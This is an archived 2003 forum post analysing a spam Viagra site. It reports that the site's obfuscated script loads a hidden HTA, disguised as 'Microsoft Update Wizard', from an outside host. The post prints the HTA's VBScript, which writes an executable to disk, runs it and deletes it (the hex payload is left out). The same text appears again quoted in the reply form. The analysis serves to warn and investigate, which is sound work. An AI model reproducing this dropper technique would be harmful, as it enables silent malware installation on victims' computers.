Viagra or Trojan? -- Pills vendor intelligence

VoyForums has a no-popup policy. If you think you are receiving a pop-up originating from a VoyForum,
please report the Forum ID and any ad info using this contact form.

[ VoyUser Login optional ] [ Contact Forum Admin ] [ Main index ] [ Post a new message ] [ Search | Check update time | Archives: 1, 2, 3, 4, 5, [6], 7 ]

[ Next Thread | Previous Thread | Next Message | Previous Message ]

Date Posted: 23:12:32 11/03/03 Mon
Author: Scammer
Subject: Viagra or Trojan?

Viagra or Trojan? [well, if you get Viagra, I guess you would
be using Trojans ...]

Spamvertized URL: http://alldolly.net/discounts/?pid=evaph3770

(NANAS posting:
Subject: [email] V1@GRA --> 80% D1SC0UNT!! jjxcxuiz lqihjgkuf)

The site appears to be a Viagra site but the ordering is down now.
Was it ever up or is the site a fake Viagra site used to install
a trojan?

------------------------------------------------------------
There is a header section on the spamvertized page which is
mildly encrypted (decimal ascii values for the characters)
which defines two functions:
DecodeHead() (which is immediately run) and
DecodeB() (run at the end of the page)

What do we get?

[object data="http://www.extreme-rapes.com/cgi-bin/htmlhelp.cgi"
style="display:none"][/object]

What is "http://www.extreme-rapes.com/cgi-bin/htmlhelp.cgi"?

Content-Type: application/hta

[TITLE]Microsoft Update Wizard[/TITLE]
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE

[OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"][/OBJECT]
[OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"][/OBJECT]
[BODY][SCRIPT language="VBScript"]

self.MoveTo 6000,6000

[Then 61 lines of hex encoded data.]

FileName="C:\netlog.exe"
set IESetup=MSmedia.CreateTextFile(FileName, TRUE)
[write the bytes of the code to the file:
IESetup.Write(Chr(Exe_Byte))]
MSplay.Run (FileName),1,TRUE
MSmedia.DeleteFile(FileName)
------------------------------------------------------------

[ Next Thread | Previous Thread | Next Message | Previous Message ]

[ VoyUser Login ] Not required to post.
Post a public reply to this message | Go post a new public message
* Notice: Posting problems? [ Click here ]
* HTML allowed in marked fields.
Message subject (required):

Name (required):

Expression ^{(Optional mood/title along with your name) Examples: (happy, sad, The Joyful, etc.) help)}

E-mail address (optional):

Type your message here:
>Viagra or Trojan? [well, if you get Viagra, I guess >you would > be using Trojans ...] > >Spamvertized URL: >http://alldolly.net/discounts/?pid=evaph3770 > >(NANAS posting: > Subject: [email] V1@GRA --> 80% D1SC0UNT!! >jjxcxuiz lqihjgkuf) > >The site appears to be a Viagra site but the ordering >is down now. >Was it ever up or is the site a fake Viagra site used >to install >a trojan? > > > >------------------------------------------------------- >----- > There is a header section on the spamvertized page >which is > mildly encrypted (decimal ascii values for the >characters) > which defines two functions: > DecodeHead() (which is immediately run) and > DecodeB() (run at the end of the page) > > What do we get? > > [object >data="http://www.extreme-rapes.com/cgi-bin/htmlhelp.cgi >" > style="display:none"][/object] > > What is >"http://www.extreme-rapes.com/cgi-bin/htmlhelp.cgi"? > > Content-Type: application/hta > > [TITLE]Microsoft Update Wizard[/TITLE] > APPLICATIONNAME="Microsoft Update" > SHOWINTASKBAR=NO > CAPTION=YES > SINGLEINSTANCE=YES > MAXIMIZEBUTTON=NO > MINIMIZEBUTTON=NO > WINDOWSTATE=MINIMIZE > > [OBJECT id="MSmedia" >classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"][/ >OBJECT] > [OBJECT id="MSplay" >classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"][/ >OBJECT] > [BODY][SCRIPT language="VBScript"] > > self.MoveTo 6000,6000 > > [Then 61 lines of hex encoded data.] > > FileName="C:\netlog.exe" > set IESetup=MSmedia.CreateTextFile(FileName, TRUE) > [write the bytes of the code to the file: > IESetup.Write(Chr(Exe_Byte))] > MSplay.Run (FileName),1,TRUE > MSmedia.DeleteFile(FileName) > >------------------------------------------------------- >-----

Notice: Copies of your message may remain on this and other systems on internet. Please be respectful.

[ Contact Forum Admin ]

Forum timezone: GMT-8
VF Version: 2.94, ConfDB:
Before posting please read our privacy policy.
VoyForums^(tm) is a Free Service from Voyager Info-Systems.
Copyright © 1998-2008 Voyager Info-Systems. All Rights Reserved.